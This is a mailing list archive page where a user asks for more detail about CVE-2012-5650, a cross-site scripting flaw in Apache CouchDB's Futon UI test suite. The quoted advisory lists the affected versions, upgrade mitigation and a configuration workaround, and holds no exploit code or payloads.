couchdb-user mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Eli Stevens (Gmail)" <wickedg...@gmail.com>
Subject Re: CVE-2012-5650 Apache CouchDB DOM based Cross-Site Scripting via Futon UI
Date Mon, 14 Jan 2013 16:14:35 GMT
(I've trimmed the CC list; apologies if that's incorrect)

Would it be possible to get a more complete description of this issue?

Specifically, it would be nice to get a more exact description of the
access required for an attacker to initiate the attack.  I can make some
reasonable guesses, but I would rather not rely on guesses when it comes to
issuing updates to our customers.

Thanks,
Eli


On Mon, Jan 14, 2013 at 2:05 AM, Jan Lehnardt <jan@apache.org> wrote:

> CVE-2012-5650
>
> DOM based Cross-Site Scripting via Futon UI
>
> Affected Versions:
> Apache CouchDB releases up to and including 1.0.3, 1.1.1, and 1.2.0
> are vulnerable.
>
> Description:
> Query parameters passed into the browser-based test suite are not
> sanitised,
> and can be used to load external resources. An attacker may execute
> JavaScript
> code in the browser, using the context of the remote user.
>
> Mitigation:
> Upgrade to a supported release that includes this fix, such as Apache
> CouchDB 1.0.4, 1.1.2, 1.2.1, and the future 1.3.x series, all of which
> include a specific fix.
>
> Work-Around:
> Disable the Futon user interface completely, by adapting `local.ini` and
> restarting CouchDB:
>
>     [httpd_global_handlers]
>     _utils = {couch_httpd_misc_handlers, handle_welcome_req,
> <<"Forbidden">>}
>
> Or by removing the UI test suite components:
>
>     share/www/verify_install.html
>     share/www/couch_tests.html
>     share/www/custom_test.html
>
> Acknowledgement:
> This vulnerability was discovered & reported to the Apache Software
> Foundation
> by Frederik Braun https://frederik-braun.com/
>
> Jan Lehnardt
> --
>
>

Mime
  • Unnamed multipart/alternative (inline, None, 0 bytes)
View raw message